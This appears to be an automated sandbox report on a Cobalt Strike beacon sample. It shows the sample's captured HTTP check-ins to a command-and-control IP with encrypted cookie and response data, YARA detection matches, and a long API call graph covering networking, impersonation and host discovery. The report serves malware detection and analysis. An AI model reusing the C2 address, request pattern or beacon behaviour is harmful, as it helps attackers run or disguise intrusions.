        Data Ascii: CWf7lkm4ccdxAuwFbO8a/NPhdJg0L9v+B9NfOcWSbv9MAbQqNRU1ZVPw8mvatG/A9zyHqJEtWAk2yBR50JhHEoVC1/atl3Qqggd80a90B00=


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        133192.168.2.8498438.148.6.140807776C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:30:14.092387915 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:30:24.056334972 CET529INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:30:23 GMT
        Server: nginx
        Content-Length: 344
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 33 66 62 61 47 56 4b 49 41 7a 48 6f 48 33 38 4b 46 4b 41 76 4e 48 68 6f 56 66 45 47 35 5a 68 4f 36 49 54 55 59 61 31 38 50 78 6e 69 41 72 32 66 46 4a 6a 54 38 2b 38 79 76 76 54 45 47 74 2f 65 49 56 37 4b 74 36 50 48 4b 52 2f 33 63 39 72 74 45 39 4d 4f 64 50 54 43 6a 4c 64 6e 54 77 43 4d 4e 4f 4b 48 76 50 36 65 7a 5a 33 6e 4b 50 41 51 39 7a 42 6a 44 75 74 6b 4c 46 6f 45 45 61 51 75 4a 5a 47 41 2b 79 5a 46 34 55 52 68 4b 75 6c 69 6d 64 39 51 71 30 37 2f 73 50 78 5a 56 66 6e 70 45 59 61 45 6a 4f 74 45 4d 67 39 5a 75 56 69 79 57 4e 55 33 34 6f 31 69 2b 4c 4d 39 4b 31 4d 44 46 67 44 55 6c 4e 56 78 70 63 50 64 71 6a 6a 66 50 30 51 2f 48 39 42 66 65 41 48 2f 6e 75 4d 54 35 54 47 6c 59 4f 79 70 66 2f 6a 63 6c 30 72 49 7a 2b 74 4f 67 4f 4a 4c 5a 57 72 4c 34 56 4a 72 64 35 59 4c 48 52 65 4b 35 34 44 50 33 65 44 4a 39 44 31 5a 35 65 47 37 4b 73 58 6e 67 6c 66 78 39 31 57 6d 64 38 37 64 44 7a 53 2f 4c 37 4d 32 77 36 5a 7a 4f 47 67 67 58 75 74 4e 57 45 46 43 47 4a 67 4b 37 57 72 72 39 49 52 76 64 6d 2b 79 51 76 [TRUNCATED]
        Data Ascii: 3fbaGVKIAzHoH38KFKAvNHhoVfEG5ZhO6ITUYa18PxniAr2fFJjT8+8yvvTEGt/eIV7Kt6PHKR/3c9rtE9MOdPTCjLdnTwCMNOKHvP6ezZ3nKPAQ9zBjDutkLFoEEaQuJZGA+yZF4URhKulimd9Qq07/sPxZVfnpEYaEjOtEMg9ZuViyWNU34o1i+LM9K1MDFgDUlNVxpcPdqjjfP0Q/H9BfeAH/nuMT5TGlYOypf/jcl0rIz+tOgOJLZWrL4VJrd5YLHReK54DP3eDJ9D1Z5eG7KsXnglfx91Wmd87dDzS/L7M2w6ZzOGggXutNWEFCGJgK7Wrr9IRvdm+yQvZErw==


        Click to jump to process

        Click to jump to process

        Target ID:1
        Start time:03:26:08
        Start date:10/01/2025
        Path:C:\Users\user\Desktop\beacon_x86.exe
        Wow64 process (32bit):true
        Commandline:"C:\Users\user\Desktop\beacon_x86.exe"
        Imagebase:0x400000
        File size:324'096 bytes
        MD5 hash:BFFE5DBE4D4ECECC6652360CE37B8075
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000001.00000002.3882200345.0000000000D97000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000001.00000002.3882200345.0000000000D97000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000001.00000003.1419965781.0000000000810000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000001.00000003.1419965781.0000000000810000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000001.00000003.1419965781.0000000000810000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
        • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000001.00000003.1419965781.0000000000810000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
        Reputation:low
        Has exited:false

        Reset < >

          Execution Graph

          Execution Coverage:4.6%
          Dynamic/Decrypted Code Coverage:88.7%
          Signature Coverage:13.9%
          Total number of Nodes:746
          Total number of Limit Nodes:20
          execution_graph 21443 401441 _cexit 21546 d68ed4 158 API calls 21547 d826dc RtlUnwind 21444 d608d3 99 API calls 6 library calls 21548 402242 signal 20644 d69877 240 API calls ___DllMainCRTStartup 21550 401a5c 12 API calls 21554 d7d2ff 81 API calls 2 library calls 21556 d7a976 73 API calls 9 library calls 21448 d684fd 107 API calls ___DllMainCRTStartup 21557 d68ef8 105 API calls 21558 d68ee5 Sleep 21449 40246a EnterCriticalSection TlsGetValue GetLastError LeaveCriticalSection 21450 d648e0 158 API calls ___DllMainCRTStartup 21451 d68cee 173 API calls 21452 d61896 HttpAddRequestHeadersA ___DllMainCRTStartup 21453 401001 __set_app_type __p__fmode __set_app_type __setusermatherr 21561 d60a81 153 API calls 21562 d7068a 63 API calls 21563 d68e89 99 API calls 21460 401426 GetStartupInfoA 21461 d690b1 105 API calls 21462 402408 free LeaveCriticalSection 21564 d68eb1 48 API calls 21566 d692b8 htonl htonl _memset ___DllMainCRTStartup 21466 d668a8 99 API calls 21468 d69057 133 API calls 21569 d68e59 104 API calls 21469 d69047 105 API calls 21471 d82c4e 48 API calls 7 library calls 21472 d6404d 77 API calls 3 library calls 21571 d68e49 112 API calls 21572 d68e79 101 API calls 21478 d69017 100 API calls 21479 d66415 98 API calls ___DllMainCRTStartup 21480 d69007 100 API calls 21577 d82a09 46 API calls 2 library calls 21578 401296 15 API calls 21482 40107a __p__fmode __set_app_type __setusermatherr 21483 d66c08 PeekNamedPipe Sleep 21484 4014a0 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 21581 d60a39 76 API calls 21582 d68e39 114 API calls 21486 d69027 99 API calls 21583 d68e25 109 API calls 21487 d64821 173 API calls 2 library calls 21585 d7d220 SetLastError __freefls@4 21586 d68e2f 101 API calls 21587 d683d3 100 API calls ___DllMainCRTStartup 21489 d66ddf shutdown closesocket 21490 d68ddc 175 API calls 21491 d7cddd 47 API calls 3 library calls 21588 d68fdc 176 API calls 20645 d795dc 20646 d795e7 20645->20646 20647 d795ec 20645->20647 20663 d80da8 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 20646->20663 20651 d794e6 20647->20651 20650 d795fa 20654 d794f2 __freefls@4 20651->20654 20652 d7953f 20661 d7958f __freefls@4 20652->20661 20713 d69802 20652->20713 20654->20652 20654->20661 20664 d793b1 20654->20664 20655 d79552 20657 d7956f 20655->20657 20658 d69802 ___DllMainCRTStartup 253 API calls 20655->20658 20659 d793b1 __CRT_INIT@12 95 API calls 20657->20659 20657->20661 20660 d79566 20658->20660 20659->20661 20662 d793b1 __CRT_INIT@12 95 API calls 20660->20662 20661->20650 20662->20657 20663->20647 20665 d793c0 20664->20665 20666 d7943c 20664->20666 20731 d7968a HeapCreate 20665->20731 20668 d79473 20666->20668 20676 d79442 20666->20676 20669 d794d1 20668->20669 20670 d79478 20668->20670 20674 d793cb 20669->20674 20766 d7c8e0 47 API calls 2 library calls 20669->20766 20745 d7c5c6 TlsGetValue 20670->20745 20673 d793d2 20733 d7c94e 49 API calls 8 library calls 20673->20733 20674->20652 20675 d7945d 20675->20674 20743 d7f145 46 API calls ___crtwsetenv 20675->20743 20676->20674 20676->20675 20742 d77f0a 45 API calls _doexit 20676->20742 20682 d793d7 __RTC_Initialize 20685 d793db 20682->20685 20692 d793e7 GetCommandLineA 20682->20692 20684 d79489 20684->20674 20751 d7c54b Sleep GetModuleHandleW GetModuleHandleW GetProcAddress __crt_waiting_on_module_handle 20684->20751 20734 d796ba VirtualFree HeapDestroy 20685->20734 20686 d79467 20744 d7c5fa 5 API calls __decode_pointer 20686->20744 20690 d793e0 20690->20674 20735 d80c71 50 API calls 2 library calls 20692->20735 20693 d794a7 20699 d794c5 20693->20699 20700 d794ae 20693->20700 20696 d793f7 20736 d7eef1 50 API calls 3 library calls 20696->20736 20698 d79401 20701 d79405 20698->20701 20738 d80bb6 66 API calls 3 library calls 20698->20738 20753 d77722 20699->20753 20752 d7c637 45 API calls 5 library calls 20700->20752 20737 d7c5fa 5 API calls __decode_pointer 20701->20737 20706 d794b5 GetCurrentThreadId 20706->20674 20707 d79411 20708 d79425 20707->20708 20739 d8093e 65 API calls 6 library calls 20707->20739 20708->20690 20741 d7f145 46 API calls ___crtwsetenv 20708->20741 20711 d7941a 20711->20708 20740 d77d2d 52 API calls 5 library calls 20711->20740 20714 d698b0 20713->20714 20718 d69812 ___DllMainCRTStartup 20713->20718 20853 d6b35d 72 API calls 3 library calls 20714->20853 20716 d69817 ___DllMainCRTStartup 20716->20655 20717 d698b8 20717->20716 20718->20716 20727 d69895 20718->20727 20772 d6cae1 20718->20772 20721 d69850 20722 d69897 20721->20722 20723 d6985f 20721->20723 20721->20727 20722->20727 20852 d6ca6f GetCurrentProcess GetCurrentProcess UnmapViewOfFile ___DllMainCRTStartup 20722->20852 20724 d6987c 20723->20724 20725 d69873 HeapDestroy 20723->20725 20723->20727 20779 d6c492 20724->20779 20725->20724 20725->20727 20785 d6031c 20727->20785 20730 d6c492 ___DllMainCRTStartup 2 API calls 20730->20727 20732 d793c6 20731->20732 20732->20673 20732->20674 20733->20682 20734->20690 20735->20696 20736->20698 20738->20707 20739->20711 20740->20708 20741->20701 20742->20675 20743->20686 20746 d7947d 20745->20746 20747 d7c5db 20745->20747 20750 d80852 45 API calls _calloc 20746->20750 20767 d7c54b Sleep GetModuleHandleW GetModuleHandleW GetProcAddress __crt_waiting_on_module_handle 20747->20767 20749 d7c5e6 TlsSetValue 20749->20746 20750->20684 20751->20693 20752->20706 20755 d7772e __freefls@4 20753->20755 20754 d7776d 20756 d77782 HeapFree 20754->20756 20758 d777a7 __dosmaperr __freefls@4 20754->20758 20755->20754 20755->20758 20768 d798aa 45 API calls 2 library calls 20755->20768 20756->20758 20759 d77794 20756->20759 20758->20690 20771 d79641 45 API calls __getptd_noexit 20759->20771 20760 d77745 ___sbh_find_block 20763 d7775f 20760->20763 20769 d7990d HeapFree 20760->20769 20762 d77799 GetLastError 20762->20758 20770 d77778 RtlLeaveCriticalSection _doexit 20763->20770 20766->20674 20767->20749 20768->20760 20769->20763 20770->20754 20771->20762 20773 d6caee 20772->20773 20774 d6cb6c VirtualQuery 20772->20774 20773->20774 20775 d6cb37 GetCurrentProcess 20773->20775 20776 d6cb1a GetCurrentProcess 20773->20776 20774->20721 20777 d6cb34 ___DllMainCRTStartup 20775->20777 20776->20777 20777->20774 20778 d6cb67 20777->20778 20778->20721 20780 d6c51e VirtualFree 20779->20780 20781 d6c4a2 20779->20781 20782 d69887 20780->20782 20781->20780 20783 d6c4c1 GetCurrentProcess 20781->20783 20782->20727 20782->20730 20784 d6c4d9 ___DllMainCRTStartup 20783->20784 20784->20780 20784->20782 20854 d671bc 20785->20854 20787 d60332 ___DllMainCRTStartup 20861 d777ff 20787->20861 20789 d603b7 ___DllMainCRTStartup 20879 d6bb1c 20789->20879 20795 d6040b 20796 d6da37 ___DllMainCRTStartup 50 API calls 20795->20796 20797 d6041d 20796->20797 20906 d6286e 20797->20906 20799 d60425 20800 d60429 20799->20800 20802 d6042e ___DllMainCRTStartup 20799->20802 21003 d6ce47 65 API calls ___DllMainCRTStartup 20800->21003 20803 d60443 20802->20803 20804 d60448 20802->20804 21004 d6ce47 65 API calls ___DllMainCRTStartup 20803->21004 20911 d628cc 20804->20911 20808 d60456 20917 d62927 20808->20917 20809 d60451 21005 d6ce47 65 API calls ___DllMainCRTStartup 20809->21005 20813 d6045f 21006 d6ce47 65 API calls ___DllMainCRTStartup 20813->21006 20815 d60464 ___DllMainCRTStartup 20816 d777ff _malloc 45 API calls 20815->20816 20817 d6048b 20816->20817 20818 d60496 20817->20818 20819 d6049b ___DllMainCRTStartup 20817->20819 21007 d6ce47 65 API calls ___DllMainCRTStartup 20818->21007 20821 d6da37 ___DllMainCRTStartup 50 API calls 20819->20821 20822 d604ae ___DllMainCRTStartup 20821->20822 20929 d67060 GetACP GetOEMCP 20822->20929 20824 d606ac 21018 d6bea0 45 API calls ___crtwsetenv 20824->21018 20826 d6bdfa 46 API calls ___DllMainCRTStartup 20844 d604c0 ___DllMainCRTStartup 20826->20844 20827 d606b5 20828 d77722 ___crtwsetenv 45 API calls 20827->20828 20829 d606be 20828->20829 21019 d6ce47 65 API calls ___DllMainCRTStartup 20829->21019 20831 d606c4 20831->20716 20832 d77956 73 API calls __snprintf 20832->20844 20844->20824 20844->20826 20844->20832 20847 d6286e GetLocalTime ___DllMainCRTStartup 20844->20847 20850 d60606 20844->20850 20967 d6173c 20844->20967 20976 d61e3d 20844->20976 20983 d67fa1 20844->20983 20990 d6200f 20844->20990 20993 d644a0 20844->20993 21008 d65072 45 API calls 6 library calls 20844->21008 21009 d6acc5 99 API calls 3 library calls 20844->21009 21010 d6936c htonl htonl _memset ___DllMainCRTStartup 20844->21010 21011 d63f55 113 API calls 2 library calls 20844->21011 21012 d66853 99 API calls ___DllMainCRTStartup 20844->21012 21013 d66017 106 API calls 4 library calls 20844->21013 21014 d61fb7 98 API calls ___DllMainCRTStartup 20844->21014 20847->20844 20849 d6173c ___DllMainCRTStartup 4 API calls 20849->20850 20850->20844 20850->20849 21015 d61962 88 API calls 3 library calls 20850->21015 21016 d6ce47 65 API calls ___DllMainCRTStartup 20850->21016 21017 d6ce47 65 API calls ___DllMainCRTStartup 20850->21017 20852->20727 20853->20717 20855 d777ff _malloc 45 API calls 20854->20855 20856 d671c7 20855->20856 20857 d777ff _malloc 45 API calls 20856->20857 20860 d671e4 _memset ___DllMainCRTStartup 20856->20860 20858 d671d7 20857->20858 20859 d77722 ___crtwsetenv 45 API calls 20858->20859 20858->20860 20859->20860 20860->20787 20862 d778b2 20861->20862 20872 d77811 20861->20872 21027 d7a77f Sleep GetModuleHandleW GetModuleHandleW GetProcAddress __decode_pointer 20862->21027 20864 d778b8 21028 d79641 45 API calls __getptd_noexit 20864->21028 20869 d7786e RtlAllocateHeap 20869->20872 20870 d77822 20870->20872 21020 d7a737 45 API calls 2 library calls 20870->21020 21021 d7a58c 45 API calls 7 library calls 20870->21021 21022 d77cc2 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 20870->21022 20872->20869 20872->20870 20873 d7789e 20872->20873 20876 d778a3 20872->20876 20878 d778aa 20872->20878 21023 d777b0 45 API calls 4 library calls 20872->21023 21024 d7a77f Sleep GetModuleHandleW GetModuleHandleW GetProcAddress __decode_pointer 20872->21024 21025 d79641 45 API calls __getptd_noexit 20873->21025 21026 d79641 45 API calls __getptd_noexit 20876->21026 20878->20789 21029 d78e8e GetSystemTimeAsFileTime 20879->21029 20881 d6bb2d 21031 d77c0a 20881->21031 20884 d777ff _malloc 45 API calls 20885 d6bb76 _memset 20884->20885 21034 d790d5 20885->21034 20887 d6bbe2 20888 d790d5 _strtok 45 API calls 20887->20888 20890 d603f0 20888->20890 20889 d6bbb9 20889->20887 20891 d790d5 _strtok 45 API calls 20889->20891 20892 d64c3e 20890->20892 20891->20889 20893 d78e8e __time64 GetSystemTimeAsFileTime 20892->20893 20894 d64c50 20893->20894 20895 d77c0a ___DllMainCRTStartup 45 API calls 20894->20895 20896 d64c57 ___DllMainCRTStartup 20895->20896 21072 d64cc4 20896->21072 20899 d6da37 20900 d6da50 20899->20900 20905 d6da63 _memset 20899->20905 20901 d6da65 20900->20901 20902 d6da59 20900->20902 21077 d79196 50 API calls 10 library calls 20901->21077 20903 d777ff _malloc 45 API calls 20902->20903 20903->20905 20905->20795 20907 d6287c ___DllMainCRTStartup 20906->20907 20908 d62882 GetLocalTime 20907->20908 20909 d62880 20907->20909 20910 d62894 ___DllMainCRTStartup 20908->20910 20909->20799 20910->20799 20912 d628d7 ___DllMainCRTStartup 20911->20912 20916 d6044d 20912->20916 21078 d6b0d3 79 API calls ___DllMainCRTStartup 20912->21078 20914 d6290f 21079 d6b0fd 73 API calls 3 library calls 20914->21079 20916->20808 20916->20809 20918 d6293e ___DllMainCRTStartup 20917->20918 20919 d6045b 20918->20919 20920 d62980 htonl htonl 20918->20920 20919->20813 20919->20815 20920->20919 20921 d629a0 20920->20921 20922 d777ff _malloc 45 API calls 20921->20922 20923 d629a9 ___DllMainCRTStartup 20922->20923 20924 d629f3 _memset 20923->20924 21080 d6b0d3 79 API calls ___DllMainCRTStartup 20923->21080 20928 d77722 ___crtwsetenv 45 API calls 20924->20928 20926 d629e1 21081 d6b0fd 73 API calls 3 library calls 20926->21081 20928->20919 21082 d6dfea 20929->21082 20935 d77c0a ___DllMainCRTStartup 45 API calls 20936 d670b4 20935->20936 21094 d60311 20936->21094 20938 d670ba __RTC_InitBase 20939 d670d3 GetCurrentProcess 20938->20939 20940 d670cd 20938->20940 21155 d63354 GetModuleHandleA GetProcAddress 20939->21155 21097 d6d442 AllocateAndInitializeSid 20940->21097 20942 d670df 20942->20940 20946 d67103 21105 d6142d 20946->21105 20949 d6142d ___DllMainCRTStartup htonl 20950 d6711f 20949->20950 20951 d6142d ___DllMainCRTStartup htonl 20950->20951 20952 d6712c 20951->20952 21109 d613de htonl 20952->21109 20955 d613de ___DllMainCRTStartup 2 API calls 20956 d67141 20955->20956 21112 d613fb 20956->21112 20964 d67162 _memset ___DllMainCRTStartup 21148 d6af60 20964->21148 20966 d671a7 _memset 20966->20844 21295 d6cec2 20967->21295 20969 d617bf InternetOpenA 20971 d617cd InternetConnectA 20969->20971 20970 d61751 ___DllMainCRTStartup 20970->20969 20970->20971 20975 d6181f ___DllMainCRTStartup 20971->20975 21298 d6cee3 20975->21298 20977 d6cec2 ___DllMainCRTStartup RevertToSelf 20976->20977 20978 d61e46 20977->20978 21301 d61c3f 20978->21301 20981 d6cee3 ___DllMainCRTStartup ImpersonateLoggedOnUser 20982 d61e5e 20981->20982 20982->20844 21358 d67b1a 20983->21358 20986 d67fa9 20987 d67fc8 20986->20987 21385 d67e51 20986->21385 21396 d67db3 48 API calls ___crtwsetenv 20987->21396 20989 d67fcd 20989->20844 20991 d6dfea ___DllMainCRTStartup 3 API calls 20990->20991 20992 d6201e 20991->20992 20992->20844 20995 d644ac ___DllMainCRTStartup 20993->20995 20994 d644f8 Sleep 21001 d644f3 20994->21001 20995->20994 20996 d644d0 20995->20996 21420 d64519 127 API calls 2 library calls 20995->21420 21406 d64657 20996->21406 20999 d644c7 20999->20994 20999->20996 21001->20844 21003->20802 21004->20804 21005->20808 21006->20815 21007->20819 21008->20844 21009->20844 21010->20844 21011->20844 21012->20844 21013->20844 21014->20844 21015->20850 21016->20844 21017->20844 21018->20827 21019->20831 21020->20870 21021->20870 21023->20872 21024->20872 21025->20876 21026->20878 21027->20864 21028->20878 21030 d78ebe __aulldiv 21029->21030 21030->20881 21039 d7c797 21031->21039 21035 d7c797 __getptd 45 API calls 21034->21035 21036 d790f8 21035->21036 21063 d7f331 21036->21063 21038 d79194 21038->20889 21044 d7c71e GetLastError 21039->21044 21041 d7c79f 21042 d6bb33 21041->21042 21059 d77c6e 45 API calls 3 library calls 21041->21059 21042->20884 21045 d7c5c6 ___set_flsgetvalue 6 API calls 21044->21045 21046 d7c735 21045->21046 21047 d7c73d 21046->21047 21048 d7c78b SetLastError 21046->21048 21060 d80852 45 API calls _calloc 21047->21060 21048->21041 21050 d7c749 21050->21048 21061 d7c54b Sleep GetModuleHandleW GetModuleHandleW GetProcAddress __crt_waiting_on_module_handle 21050->21061 21052 d7c763 21053 d7c782 21052->21053 21054 d7c76a 21052->21054 21056 d77722 ___crtwsetenv 42 API calls 21053->21056 21062 d7c637 45 API calls 5 library calls 21054->21062 21058 d7c788 21056->21058 21057 d7c772 GetCurrentThreadId 21057->21048 21058->21048 21059->21042 21060->21050 21061->21052 21062->21057 21064 d7f33b IsDebuggerPresent 21063->21064 21065 d7f339 21063->21065 21071 d81865 21064->21071 21065->21038 21068 d831bf SetUnhandledExceptionFilter UnhandledExceptionFilter 21069 d831e4 GetCurrentProcess TerminateProcess 21068->21069 21070 d831dc __invoke_watson 21068->21070 21069->21038 21070->21069 21071->21068 21073 d603f9 21072->21073 21075 d64cd6 ___DllMainCRTStartup 21072->21075 21073->20899 21074 d777ff _malloc 45 API calls 21074->21075 21075->21073 21075->21074 21076 d6da37 ___DllMainCRTStartup 50 API calls 21075->21076 21076->21075 21077->20905 21078->20914 21079->20916 21080->20926 21081->20924 21156 d6df82 21082->21156 21085 d67090 21087 d6aecf 21085->21087 21088 d6aee1 ___DllMainCRTStartup 21087->21088 21163 d70270 21088->21163 21090 d6aefd ___DllMainCRTStartup 21093 d67099 GetTickCount 21090->21093 21169 d86320 21090->21169 21174 d77ede 45 API calls _doexit 21090->21174 21093->20935 21095 d6200f ___DllMainCRTStartup 3 API calls 21094->21095 21096 d60316 21095->21096 21096->20938 21098 d6d482 CheckTokenMembership 21097->21098 21099 d670ed 21097->21099 21100 d6d497 FreeSid 21098->21100 21101 d6d494 21098->21101 21102 d613a9 21099->21102 21100->21099 21101->21100 21103 d862d6 21102->21103 21104 d613b8 htonl 21103->21104 21104->20946 21106 d6145e 21105->21106 21107 d6143c 21105->21107 21106->20949 21108 d6144a htonl 21107->21108 21108->21106 21110 d6142d ___DllMainCRTStartup htonl 21109->21110 21111 d613f8 21110->21111 21111->20955 21113 d61406 21112->21113 21114 d6142d ___DllMainCRTStartup htonl 21113->21114 21115 d61418 21114->21115 21116 d6141b 21115->21116 21117 d6142d ___DllMainCRTStartup htonl 21116->21117 21118 d6142a 21117->21118 21119 d66f09 21118->21119 21120 d671bc ___DllMainCRTStartup 45 API calls 21119->21120 21121 d66f1c ___DllMainCRTStartup 21120->21121 21122 d66f5e GetUserNameA GetComputerNameA 21121->21122 21176 d61f10 21122->21176 21125 d66f9c _strrchr 21126 d66fb9 GetVersionExA 21125->21126 21127 d6141b ___DllMainCRTStartup htonl 21126->21127 21128 d66fd6 21127->21128 21129 d6141b ___DllMainCRTStartup htonl 21128->21129 21130 d66fe1 21129->21130 21131 d613fb ___DllMainCRTStartup htonl 21130->21131 21132 d66fec 21131->21132 21133 d613de ___DllMainCRTStartup 2 API calls 21132->21133 21134 d66ff4 21133->21134 21135 d613de ___DllMainCRTStartup 2 API calls 21134->21135 21136 d67000 21135->21136 21137 d613de ___DllMainCRTStartup 2 API calls 21136->21137 21138 d6700c 21137->21138 21139 d613de ___DllMainCRTStartup 2 API calls 21138->21139 21140 d67015 21139->21140 21179 d77956 21140->21179 21143 d6142d ___DllMainCRTStartup htonl 21144 d67051 21143->21144 21194 d67207 21144->21194 21147 d61468 htonl 21147->20964 21149 d6af71 ___DllMainCRTStartup 21148->21149 21219 d6fcd9 21149->21219 21151 d6af9d 21154 d6afc8 21151->21154 21243 d701a5 21151->21243 21247 d77ede 45 API calls _doexit 21151->21247 21154->20966 21155->20942 21157 d6dfa7 21156->21157 21158 d6dfc2 CryptGenRandom 21157->21158 21161 d6dfbe 21157->21161 21159 d6dfe6 21158->21159 21160 d6dfd7 CryptReleaseContext 21158->21160 21159->21160 21160->21161 21161->21085 21162 d6df0c GetSystemTimeAsFileTime _clock 21161->21162 21162->21085 21164 d7027b ___DllMainCRTStartup 21163->21164 21165 d777ff _malloc 45 API calls 21164->21165 21166 d7028f 21164->21166 21168 d7029e 21165->21168 21166->21090 21167 d77722 ___crtwsetenv 45 API calls 21167->21166 21168->21166 21168->21167 21172 d86344 ___DllMainCRTStartup 21169->21172 21171 d86b1f 21171->21090 21173 d86960 21172->21173 21175 d87df9 19 API calls _RTC_Failure 21172->21175 21173->21090 21174->21090 21175->21171 21200 d61f1b 21176->21200 21180 d77966 21179->21180 21181 d77983 21179->21181 21213 d79641 45 API calls __getptd_noexit 21180->21213 21183 d779af 21181->21183 21185 d77992 21181->21185 21217 d7a90b 73 API calls 11 library calls 21183->21217 21184 d7796b 21214 d7b5da 4 API calls 2 library calls 21184->21214 21215 d79641 45 API calls __getptd_noexit 21185->21215 21189 d779dd 21192 d6702d 21189->21192 21218 d7a7a7 71 API calls 6 library calls 21189->21218 21190 d77997 21216 d7b5da 4 API calls 2 library calls 21190->21216 21192->21143 21195 d67215 ___DllMainCRTStartup 21194->21195 21196 d77722 ___crtwsetenv 45 API calls 21195->21196 21197 d6721c 21196->21197 21198 d77722 ___crtwsetenv 45 API calls 21197->21198 21199 d6705a 21198->21199 21199->21147 21207 d61e6e 21200->21207 21202 d61f36 WSASocketA 21203 d61f50 WSAIoctl 21202->21203 21204 d61f18 GetModuleFileNameA 21202->21204 21205 d61f74 closesocket 21203->21205 21204->21125 21205->21204 21208 d61e83 WSAStartup 21207->21208 21211 d61ea5 ___DllMainCRTStartup 21207->21211 21209 d61e99 WSACleanup 21208->21209 21208->21211 21212 d77ede 45 API calls _doexit 21209->21212 21211->21202 21212->21211 21213->21184 21215->21190 21217->21189 21218->21192 21248 d7099b 21219->21248 21225 d6fdd8 21226 d6fe67 21225->21226 21228 d6fde3 21225->21228 21227 d77722 ___crtwsetenv 45 API calls 21226->21227 21229 d6fe6f 21227->21229 21260 d70e70 45 API calls 3 library calls 21228->21260 21261 d70e70 45 API calls 3 library calls 21229->21261 21232 d6fe85 21238 d6fea6 21232->21238 21239 d6ff39 21232->21239 21242 d6fd49 ___DllMainCRTStartup 21232->21242 21233 d6fe41 21234 d6fe4e 21233->21234 21235 d6fe59 21233->21235 21236 d77722 ___crtwsetenv 45 API calls 21234->21236 21237 d77722 ___crtwsetenv 45 API calls 21235->21237 21236->21242 21237->21242 21238->21242 21262 d70e70 45 API calls 3 library calls 21238->21262 21239->21242 21263 d70e70 45 API calls 3 library calls 21239->21263 21242->21151 21244 d701b5 ___DllMainCRTStartup 21243->21244 21246 d701d6 21244->21246 21288 d70f72 21244->21288 21246->21151 21247->21151 21249 d709a9 21248->21249 21250 d6fd29 21248->21250 21249->21250 21264 d72ef7 21249->21264 21250->21242 21252 d85990 21250->21252 21267 d8511c 21252->21267 21254 d859aa 21258 d6fd40 21254->21258 21280 d79641 45 API calls __getptd_noexit 21254->21280 21256 d859bd 21256->21258 21281 d79641 45 API calls __getptd_noexit 21256->21281 21258->21242 21259 d70a0c 5 API calls ___DllMainCRTStartup 21258->21259 21259->21225 21260->21233 21261->21232 21262->21242 21263->21242 21265 d777ff _malloc 45 API calls 21264->21265 21266 d72f03 21265->21266 21266->21249 21268 d85128 __freefls@4 21267->21268 21269 d85140 21268->21269 21277 d8515f _memset 21268->21277 21282 d79641 45 API calls __getptd_noexit 21269->21282 21271 d85145 21283 d7b5da 4 API calls 2 library calls 21271->21283 21273 d851d1 RtlAllocateHeap 21273->21277 21276 d85155 __freefls@4 21276->21254 21277->21273 21277->21276 21284 d798aa 45 API calls 2 library calls 21277->21284 21285 d7a0bc 5 API calls 2 library calls 21277->21285 21286 d85218 RtlLeaveCriticalSection _doexit 21277->21286 21287 d7a77f Sleep GetModuleHandleW GetModuleHandleW GetProcAddress __decode_pointer 21277->21287 21280->21256 21281->21258 21282->21271 21284->21277 21285->21277 21286->21277 21287->21277 21289 d70f7f ___DllMainCRTStartup 21288->21289 21290 d70fa2 21289->21290 21292 d70165 21289->21292 21290->21246 21293 d6dfea ___DllMainCRTStartup 3 API calls 21292->21293 21294 d70173 21293->21294 21294->21290 21296 d6ced1 21295->21296 21297 d6cecb RevertToSelf 21295->21297 21296->20970 21297->21296 21299 d6185d 21298->21299 21300 d6ceec ImpersonateLoggedOnUser 21298->21300 21299->20844 21300->21299 21302 d61c85 _memset 21301->21302 21336 d68c49 21302->21336 21304 d61c95 21305 d77956 __snprintf 73 API calls 21304->21305 21306 d61cac ___DllMainCRTStartup 21305->21306 21307 d61d01 21306->21307 21354 d64eec 73 API calls 4 library calls 21306->21354 21311 d61d2d 21307->21311 21312 d61d1d 21307->21312 21309 d61ceb 21355 d64fb6 73 API calls 4 library calls 21309->21355 21314 d77956 __snprintf 73 API calls 21311->21314 21313 d77956 __snprintf 73 API calls 21312->21313 21315 d61d28 ___DllMainCRTStartup 21313->21315 21314->21315 21316 d61d62 HttpOpenRequestA 21315->21316 21340 d618bc 21316->21340 21324 d61dab 21326 d61dae InternetCloseHandle 